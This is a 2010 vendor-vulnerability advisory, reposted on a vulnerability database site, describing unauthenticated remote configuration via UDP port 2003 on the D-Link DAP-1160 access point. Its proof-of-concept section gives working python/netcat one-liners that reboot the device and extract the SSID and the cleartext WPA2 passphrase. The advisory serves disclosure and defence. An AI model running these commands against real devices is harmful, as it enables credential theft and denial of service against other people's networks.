Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24140
HistoryJun 29, 2010 - 12:00 a.m.

IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

2010-06-2900:00:00
vulners.com
19
JSON

Security Advisory

IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

Advisory Information

Published:
2010-06-28

Updated:
2010-06-28

Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06
1.30b10
1.31b01

Vulnerability Details

Public References:
Not Assigned

Platform:
Successfully tested on D-Link DAP-1160 loaded with firmware versions:
v120b06, v130b10, v131b01.
Other models and/or firmware versions may be also affected.
Note: Only firmware version major numbers are displayed on the
administration web interface: 1.20, 1.30, 1.31

Background Information:
D-Link DAP-1160 is a wireless access points that allow wireless clients
connectivity to wired networks.
Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported.

Summary:
Unauthenticated access and modification of several device parameters,
including Wi-Fi SSID, keys and passphrases is possible.
Unauthenticated remote reboot of the device can be also performed.

Details:
DCCD is an UDP daemon that listens on port UDP 2003 of the device, that
is likely used for easy device configuration via the DCC (D-Link Click
'n Connect) protocol.
By sending properly formatted UDP datagrams to dccd daemon it is
possible to perform security relevant operation without any previous
authentication.
It is possible to remotely retrieve sensitive wireless configuration
parameters, such as Wi-Fi SSID, Encryption types, keys and passphrases,
along with other additional information.
It is also possible to remotely modify such parameters and configure the
device without any knowledge of the web administration password.
Remote reboot is another operation that an attacker may perform in an
unauthenticated way, possibly triggering a Denial-of-Service condition.

POC:

  • Remote reboot
    python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003

  • Retrieving Wi-Fi SSID
    python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt
    -u <IP_ADDR> 2003
    cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
    received datagram)

  • Retrieving WPA2 PSK
    python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' |
    nc -u -o pass.txt <IP_ADDR> 2003
    cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the
    received datagram)

Impacts:
Remote extraction of sensitive information
Modification of existing device configuration
POssible Denial-of-Service

Solutions & Workaround:
Not available

Additional Information

Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional
website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
----------- No response -----------
26/05/2010: Partial disclosure at CONFidence 2010
28/06/2010: This advisory

Additional information available at http://www.icysilence.org

JSON